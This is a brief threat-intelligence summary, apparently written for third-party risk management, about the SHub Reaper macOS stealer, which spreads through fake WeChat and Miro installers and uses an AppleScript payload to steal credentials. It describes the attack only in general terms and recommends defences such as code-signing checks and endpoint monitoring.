Stealer Spoofs Google, Microsoft & Apple to Backdoor macOS via Fake WeChat and Miro Installers
What Happened – The SHub Reaper “stealer” masquerades as legitimate WeChat and Miro installers, then leverages an AppleScript payload to gain persistence on macOS devices and exfiltrate user credentials.
Why It Matters for TPRM –
- Expands the attack surface of third‑party software supply chains on macOS.
- Enables credential theft that can be leveraged for lateral movement into partner networks.
- Highlights the need for stricter code‑signing verification and endpoint monitoring across all vendors.
Who Is Affected – Enterprises with macOS endpoints (technology SaaS, financial services, education, healthcare, and any organization allowing BYOD).
Recommended Actions – Review and harden vendor onboarding controls for macOS applications, enforce code‑signing and notarization checks, block known malicious installer URLs, and deploy endpoint detection that monitors AppleScript execution.
Technical Notes – Attack vector: phishing‑style distribution via counterfeit installers; execution via AppleScript; data types stolen include login credentials, session tokens, and potentially corporate documents. No specific CVE cited. Source: Dark Reading